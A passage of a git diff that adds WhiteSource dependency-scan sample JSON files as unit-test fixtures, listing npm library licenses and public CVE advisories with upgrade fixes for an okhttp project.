(details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helpers" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "47171bc4-609f-44ae-a45c-9541eb81761f", + "keyId": 28750195, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.7.4.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/traverse" + }, + "matchType": "SHA1", + "sha1": "9c1e7c60fb679fe4fcfaa42500833333c2058558", + "name": "traverse-7.7.4.tgz", + "artifactId": "traverse-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/traverse", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7c0bd5ee-d13c-49e5-9c70-7f6113f8ffd0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c64ea3c8-f1da-4cd7-aada-bd428f38adca", + "keyId": 28750197, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/parser/-/parser-7.7.4.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/parser" + }, + "matchType": "SHA1", + "sha1": "75ab2d7110c2cf2fa949959afb05fa346d2231bb", + "name": "parser-7.7.4.tgz", + "artifactId": "parser-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/parser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/parser" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9dad5355-a650-42f3-9c3d-8f4c0ff270ab", + "keyId": 28750191, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/types/-/types-7.7.4.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/types" + }, + "matchType": "SHA1", + "sha1": "516570d539e44ddf308c07569c258ff94fde9193", + "name": "types-7.7.4.tgz", + "artifactId": "types-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/types/v/7.7.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ca3aa2c6-a231-446d-b7c0-61efa6566962", + "keyId": 28750189, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/template/-/template-7.7.4.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/template" + }, + "matchType": "SHA1", + "sha1": "428a7d9eecffe27deac0a98e23bf8e3675d2a77b", + "name": "template-7.7.4.tgz", + "artifactId": "template-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/template", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/template/v/7.7.4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d66de47a-ab01-449a-ae4f-f214d44a8668", + "keyId": 28754336, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-split-export-declaration" + }, + "matchType": "SHA1", + "sha1": "57292af60443c4a3622cf74040ddc28e68336fd8", + "name": "helper-split-export-declaration-7.7.4.tgz", + "artifactId": "helper-split-export-declaration-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/helper-split-export-declaration", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/9182d84d-8bd8-46bf-9672-4f94fbc61f92" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7ecc3d9e-e7fb-453a-860f-2ef543328259", + "keyId": 28793341, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rox-browser/-/rox-browser-4.8.5.tgz", + "homePage": "https://rollout.io", + "genericPackageIndex": "https://www.npmjs.org/package/rox-browser" + }, + "matchType": "SHA1", + "sha1": "38f96058d8c07fc2f767b14561b05350eddc04eb", + "name": "rox-browser-4.8.5.tgz", + "artifactId": "rox-browser-4.8.5.tgz", + "version": "4.8.5", + "groupId": "rox-browser", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/79aa4b8d-2747-4e4f-861e-f15163d360be" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4d922169-532a-46ff-b92d-541ef3e1dd07", + "keyId": 28793337, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rox-ssr/-/rox-ssr-4.8.5.tgz", + "homePage": "https://rollout.io", + "genericPackageIndex": "https://www.npmjs.org/package/rox-ssr" + }, + "matchType": "SHA1", + "sha1": "c214115545c2de679bb8371885112d3fa3d2c14c", + "name": "rox-ssr-4.8.5.tgz", + "artifactId": "rox-ssr-4.8.5.tgz", + "version": "4.8.5", + "groupId": "rox-ssr", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/000d263b-2506-4be5-9ad5-940fd2d2400e" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f8361443-4b6e-437f-82be-cccdf1fa1fe8", + "keyId": 28793335, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rox-ssr-multi-entrypoints/-/rox-ssr-multi-entrypoints-0.1.2.tgz", + "homePage": "https://github.com/g-guirado/rox-ssr-multi-entrypoints", + "genericPackageIndex": "https://www.npmjs.org/package/rox-ssr-multi-entrypoints" + }, + "matchType": "SHA1", + "sha1": "f254cf7f5ce04af64a4771bed0e28bd6feb3df4e", + "name": "rox-ssr-multi-entrypoints-0.1.2.tgz", + "artifactId": "rox-ssr-multi-entrypoints-0.1.2.tgz", + "version": "0.1.2", + "groupId": "rox-ssr-multi-entrypoints", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/80e7e21e-3c88-4a88-b35c-b47348b1c36a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dcd81120-7bae-4fc9-8d80-f647f738215f", + "keyId": 28793339, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rox-node/-/rox-node-4.8.5.tgz", + "homePage": "https://rollout.io", + "genericPackageIndex": "https://www.npmjs.org/package/rox-node" + }, + "matchType": "SHA1", + "sha1": "8417f7586977c9c39dfba0b7a6eaba0c98a63c9c", + "name": "rox-node-4.8.5.tgz", + "artifactId": "rox-node-4.8.5.tgz", + "version": "4.8.5", + "groupId": "rox-node", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/eab618ed-461c-4a40-873b-e9e2281af884" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "db1acc6d-f283-42e9-996b-246d3481fd11", + "keyId": 28789560, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/resolve/-/resolve-1.13.1.tgz", + "homePage": "https://github.com/browserify/resolve#readme", + "genericPackageIndex": "https://www.npmjs.org/package/resolve" + }, + "matchType": "SHA1", + "sha1": "be0aa4c06acd53083505abb35f4d66932ab35d16", + "name": "resolve-1.13.1.tgz", + "artifactId": "resolve-1.13.1.tgz", + "version": "1.13.1", + "groupId": "resolve", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d596862d-7aa3-46fb-a00a-fe39e7eb18e4" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "814e8716-4d58-435a-96c3-6772702a7fb5", + "keyId": 28794739, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/next-seo/-/next-seo-3.1.0.tgz", + "homePage": "https://github.com/garmeeh/next-seo#readme", + "genericPackageIndex": "https://www.npmjs.org/package/next-seo" + }, + "matchType": "SHA1", + "sha1": "2269408f720aa17369ac5fb8c118a9701a4da1fa", + "name": "next-seo-3.1.0.tgz", + "artifactId": "next-seo-3.1.0.tgz", + "version": "3.1.0", + "groupId": "next-seo", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1b4bf3d9-78fa-401b-8052-2b85a42abf58" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "80d65f27-ddaa-4311-91e5-cde7f3e0c460", + "keyId": 28750671, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-syntax-jsx" + }, + "matchType": "SHA1", + "sha1": "dab2b56a36fb6c3c222a1fbc71f7bf97f327a9ec", + "name": "plugin-syntax-jsx-7.7.4.tgz", + "artifactId": "plugin-syntax-jsx-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/plugin-syntax-jsx", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/cb2d7515-248f-4d8b-912b-44bb75800153" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c74e2b5c-ccff-4b90-a6f0-6869cf30a155", + "keyId": 28750659, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx/-/plugin-transform-react-jsx-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-react-jsx" + }, + "matchType": "SHA1", + "sha1": "d91205717fae4e2f84d020cd3057ec02a10f11da", + "name": "plugin-transform-react-jsx-7.7.4.tgz", + "artifactId": "plugin-transform-react-jsx-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/plugin-transform-react-jsx", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-react-jsx" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9ab88595-7b67-4f1e-a45a-f6ca42a66f22", + "keyId": 28750675, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/helper-builder-react-jsx/-/helper-builder-react-jsx-7.7.4.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/helper-builder-react-jsx" + }, + "matchType": "SHA1", + "sha1": "da188d247508b65375b2c30cf59de187be6b0c66", + "name": "helper-builder-react-jsx-7.7.4.tgz", + "artifactId": "helper-builder-react-jsx-7.7.4.tgz", + "version": "7.7.4", + "groupId": "@babel/helper-builder-react-jsx", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/helper-builder-react-jsx" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a4f4132c-c4ca-4cad-8cb4-a47e473a157e", + "keyId": 27840810, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx-source/-/plugin-transform-react-jsx-source-7.5.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-react-jsx-source" + }, + "matchType": "SHA1", + "sha1": "583b10c49cf057e237085bcbd8cc960bd83bd96b", + "name": "plugin-transform-react-jsx-source-7.5.0.tgz", + "artifactId": "plugin-transform-react-jsx-source-7.5.0.tgz", + "version": "7.5.0", + "groupId": "@babel/plugin-transform-react-jsx-source", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/97dd8fa8-db09-4136-a8a8-a2adf4fe9c3f" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "353bc6af-0d79-45d1-9f65-fd59725bdc67", + "keyId": 27100468, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-react-jsx-self/-/plugin-transform-react-jsx-self-7.2.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-react-jsx-self" + }, + "matchType": "SHA1", + "sha1": "461e21ad9478f1031dd5e276108d027f1b5240ba", + "name": "plugin-transform-react-jsx-self-7.2.0.tgz", + "artifactId": "plugin-transform-react-jsx-self-7.2.0.tgz", + "version": "7.2.0", + "groupId": "@babel/plugin-transform-react-jsx-self", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@babel/plugin-transform-react-jsx-self" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ec61da73-e9ed-4365-8736-0cc6800b2886", + "keyId": 27100402, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@babel/plugin-transform-react-display-name/-/plugin-transform-react-display-name-7.2.0.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/@babel/plugin-transform-react-display-name" + }, + "matchType": "SHA1", + "sha1": "ebfaed87834ce8dc4279609a4f0c324c156e3eb0", + "name": "plugin-transform-react-display-name-7.2.0.tgz", + "artifactId": "plugin-transform-react-display-name-7.2.0.tgz", + "version": "7.2.0", + "groupId": "@babel/plugin-transform-react-display-name", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3f72be5e-7187-4b68-aec5-42a73ea4c35b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3315751d-99d1-4753-9c4b-a89b66d3c306", + "keyId": 27720778, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/raw-body/-/raw-body-2.4.1.tgz", + "homePage": "https://github.com/stream-utils/raw-body#readme", + "genericPackageIndex": "https://www.npmjs.org/package/raw-body" + }, + "matchType": "SHA1", + "sha1": "30ac82f98bb5ae8c152e67149dac8d55153b168c", + "name": "raw-body-2.4.1.tgz", + "artifactId": "raw-body-2.4.1.tgz", + "version": "2.4.1", + "groupId": "raw-body", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/raw-body" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + } + ], + "policyStatistics": { + "totalApproved": 0, + "totalRejected": 0, + "totalReassigned": 0, + "totalConditions": 0, + "totalIssues": 0, + "totalLibrariesAffected": 0 + }, + "vulnerabilityStatistics": { + "low": 0, + "medium": 2, + "high": 1, + "newVulnerabilities": 0, + "oldVulnerabilities": 0, + "ancientVulnerabilities": 3, + "totalOutdated": 0, + "totalVulnerableOutdated": 0, + "totalLowVulnerabilities": 0, + "totalMediumVulnerabilities": 19, + "totalHighVulnerabilities": 1, + "totalVulnerable": 3 + } +} diff --git a/unittests/scans/whitesource_sample/okhttp_many_vuln.json b/unittests/scans/whitesource_sample/okhttp_many_vuln.json new file mode 100644 index 00000000000..63236673d30 --- /dev/null +++ b/unittests/scans/whitesource_sample/okhttp_many_vuln.json @@ -0,0 +1,325 @@ +{ + "vulnerabilities":[ + { + "name":"WS-2009-0001", + "type":"WS", + "severity":"low", + "score":"0.0", + "publishDate":"2007-10-07", + "lastUpdatedDate":"2009-08-06", + "url":"https://issues.apache.org/jira/browse/CODEC-55", + "description":"Not all \"business\" method implementations of public API in Apache Commons Codec 1.x are thread safe, which might disclose the wrong data or allow an attacker to change non-private fields.\n\nUpdated 2018-10-07 - an additional review by WhiteSource research team could not indicate on a clear security vulnerability", + "project":"okhttp", + "product":"okhttp", + "library":{ + "keyUuid":"9aa14ac7-e415-4ed5-be35-bd2957fd7fd2", + "filename":"commons-codec-1.3.jar", + "name":"Codec", + "groupId":"commons-codec", + "artifactId":"commons-codec", + "version":"1.3", + "sha1":"fd32786786e2adb664d5ecc965da47629dca14ba", + "type":"MAVEN_ARTIFACT", + "description":"The codec package contains simple encoder and decoders for\n various formats such as Base64 and Hexadecimal. In addition to these\n widely used encoders and decoders, the codec package also maintains a\n collection of phonetic encoding utilities.", + "architecture":"", + "languageVersion":"" + } + }, + { + "name":"WS-2010-0001", + "type":"WS", + "severity":"medium", + "score":"5.0", + "publishDate":"2010-02-26", + "lastUpdatedDate":"2012-04-12", + "url":"https://issues.apache.org/jira/browse/CODEC-96", + "description":"Base64 encode() method is no longer thread-safe in Apache Commons Codec before version 1.7, which might disclose the wrong data or allow an attacker to change non-private fields.", + "project":"okhttp", + "product":"okhttp", + "library":{ + "keyUuid":"9aa14ac7-e415-4ed5-be35-bd2957fd7fd2", + "filename":"commons-codec-1.3.jar", + "name":"Codec", + "groupId":"commons-codec", + "artifactId":"commons-codec", + "version":"1.3", + "sha1":"fd32786786e2adb664d5ecc965da47629dca14ba", + "type":"MAVEN_ARTIFACT", + "description":"The codec package contains simple encoder and decoders for\n various formats such as Base64 and Hexadecimal. In addition to these\n widely used encoders and decoders, the codec package also maintains a\n collection of phonetic encoding utilities.", + "architecture":"", + "languageVersion":"" + }, + "topFix":{ + "vulnerability":"WS-2010-0001", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://issues.apache.org/jira/browse/CODEC-96", + "fixResolution":"Upgrade To Version 1.7", + "date":"2017-01-31 17:30:27", + "message":"Upgrade To Version" + } + }, + { + "name":"CVE-2011-1498", + "type":"CVE", + "severity":"medium", + "score":"4.3", + "publishDate":"2011-07-07", + "lastUpdatedDate":"2011-09-22", + "url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2011-1498", + "description":"Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.", + "project":"okhttp", + "product":"okhttp", + "library":{ + "keyUuid":"685abccb-3b38-4143-91bc-dda428d5d4f7", + "filename":"httpclient-4.0.1.jar", + "name":"HttpClient", + "groupId":"org.apache.httpcomponents", + "artifactId":"httpclient", + "version":"4.0.1", + "sha1":"1d7d28fa738bdbfe4fbd895d9486308999bdf440", + "type":"MAVEN_ARTIFACT", + "description":"HttpComponents Client (base module)", + "architecture":"", + "languageVersion":"" + }, + "topFix":{ + "vulnerability":"CVE-2011-1498", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://nvd.nist.gov/vuln/detail/CVE-2011-1498", + "fixResolution":"Upgrade To Version 4.1.1", + "date":"2011-07-07 21:55:02", + "message":"Upgrade To Version" + }, + "allFixes":[ + { + "vulnerability":"CVE-2011-1498", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://nvd.nist.gov/vuln/detail/CVE-2011-1498", + "fixResolution":"Upgrade To Version 4.1.1", + "date":"2011-07-07 21:55:02", + "message":"Upgrade To Version" + }, + { + "vulnerability":"CVE-2011-1498", + "type":"UPGRADE_VERSION", + "origin":"BUGZILLA", + "url":"https://bugzilla.redhat.com/show_bug.cgi?id\u003d709531", + "fixResolution":"Upgrade to version httpcomponents-client 4.1.1 or greater", + "date":"2017-12-31 16:41:02", + "message":"CVE-2011-1498 httpcomponents-client: sends Proxy-Authorization header to host when tunneling requests through authenticated proxy server", + "extraData":"key\u003d709531\u0026assignee\u003dRed Hat Product Security" + }, + { + "vulnerability":"CVE-2011-1498", + "type":"UPGRADE_VERSION", + "origin":"JIRA", + "url":"https://issues.apache.org/jira/browse/HTTPCLIENT-1061", + "fixResolution":"Upgrade to version 4.1.1 or greater", + "date":"2011-02-25 11:29:47", + "message":"Proxy-Authorization header received on server side", + "extraData":"key\u003dHTTPCLIENT-1061" + } + ] + }, + { + "name":"CVE-2012-6153", + "type":"CVE", + "severity":"medium", + "score":"4.3", + "publishDate":"2014-09-04", + "lastUpdatedDate":"2018-01-05", + "url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2012-6153", + "description":"http/conn/ssl/AbstractVerifier.java in Apache Commons HttpClient before 4.2.3 does not properly verify that the server hostname matches a domain name in the subject\u0027s Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5783.", + "project":"okhttp", + "product":"okhttp", + "library":{ + "keyUuid":"685abccb-3b38-4143-91bc-dda428d5d4f7", + "filename":"httpclient-4.0.1.jar", + "name":"HttpClient", + "groupId":"org.apache.httpcomponents", + "artifactId":"httpclient", + "version":"4.0.1", + "sha1":"1d7d28fa738bdbfe4fbd895d9486308999bdf440", + "type":"MAVEN_ARTIFACT", + "description":"HttpComponents Client (base module)", + "architecture":"", + "languageVersion":"" + }, + "topFix":{ + "vulnerability":"CVE-2012-6153", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://nvd.nist.gov/vuln/detail/CVE-2012-6153", + "fixResolution":"Upgrade To Version 4.2.3", + "date":"2014-09-04 17:55:05", + "message":"Upgrade To Version" + }, + "allFixes":[ + { + "vulnerability":"CVE-2012-6153", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://nvd.nist.gov/vuln/detail/CVE-2012-6153", + "fixResolution":"Upgrade To Version 4.2.3", + "date":"2014-09-04 17:55:05", + "message":"Upgrade To Version" + }, + { + "vulnerability":"CVE-2012-6153", + "type":"UPGRADE_VERSION", + "origin":"BUGZILLA", + "url":"https://bugzilla.redhat.com/show_bug.cgi?id\u003d1129916", + "fixResolution":"Upgrade to version httpcomponents-client 4.2.3 or greater", + "date":"2017-12-31 21:56:01", + "message":"CVE-2012-6153 Apache HttpComponents client / Apache CXF: SSL hostname verification bypass, incomplete CVE-2012-5783 fix", + "extraData":"key\u003d1129916\u0026assignee\u003dRed Hat Product Security" + }, + { + "vulnerability":"CVE-2012-6153", + "type":"CHANGE_FILES", + "origin":"GITHUB_COMMIT", + "url":"https://github.com/apache/httpcomponents-client/commit/6e14fc146a66e0f3eb362f45f95d1a58ee18886a", + "fixResolution":"Replace or update the following files: AbstractVerifier.java, TestHostnameVerifier.java", + "date":"2012-11-20 00:00:00", + "message":"Fixed CN extraction from DN of X500 principal\n\ngit-svn-id: https://svn.apache.org/repos/asf/httpcomponents/httpclient/trunk@1411702 13f79535-47bb-0310-9956-ffa450edef68", + "extraData":"key\u003d6e14fc1\u0026committerName\u003dok2c\u0026committerUrl\u003dhttps://github.com/ok2c\u0026committerAvatar\u003dhttps://avatars0.githubusercontent.com/u/235972?v\u003d4" + } + ] + }, + { + "name":"CVE-2014-3577", + "type":"CVE", + "severity":"medium", + "score":"5.8", + "publishDate":"2014-08-21", + "lastUpdatedDate":"2018-07-19", + "url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name\u003dCVE-2014-3577", + "description":"org.apache.http.conn.ssl.AbstractVerifier in Apache HttpComponents HttpClient before 4.3.5 and HttpAsyncClient before 4.0.2 does not properly verify that the server hostname matches a domain name in the subject\u0027s Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a \"CN\u003d\" string in a field in the distinguished name (DN) of a certificate, as demonstrated by the \"foo,CN\u003dwww.apache.org\" string in the O field.", + "project":"okhttp", + "product":"okhttp", + "library":{ + "keyUuid":"685abccb-3b38-4143-91bc-dda428d5d4f7", + "filename":"httpclient-4.0.1.jar", + "name":"HttpClient", + "groupId":"org.apache.httpcomponents", + "artifactId":"httpclient", + "version":"4.0.1", + "sha1":"1d7d28fa738bdbfe4fbd895d9486308999bdf440", + "type":"MAVEN_ARTIFACT", + "description":"HttpComponents Client (base module)", + "architecture":"", + "languageVersion":"" + }, + "topFix":{ + "vulnerability":"CVE-2014-3577", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://nvd.nist.gov/vuln/detail/CVE-2014-3577", + "fixResolution":"Upgrade To Version 4.3.5,4.0.2", + "date":"2014-08-21 14:55:05", + "message":"Upgrade To Version" + }, + "allFixes":[ + { + "vulnerability":"CVE-2014-3577", + "type":"UPGRADE_VERSION", + "origin":"WHITESOURCE_EXPERT", + "url":"https://nvd.nist.gov/vuln/detail/CVE-2014-3577", + "fixResolution":"Upgrade To Version 4.3.5,4.0.2", + "date":"2014-08-21 14:55:05", + "message":"Upgrade To Version" + }, + { + "vulnerability":"CVE-2014-3577", + "type":"UPGRADE_VERSION", + "origin":"SECURITY_TRACKER", + "url":"http://www.securitytracker.com/id/1030812", + "fixResolution":"The vendor has issued a fix.\n\nThe vendor\u0027s advisories are available 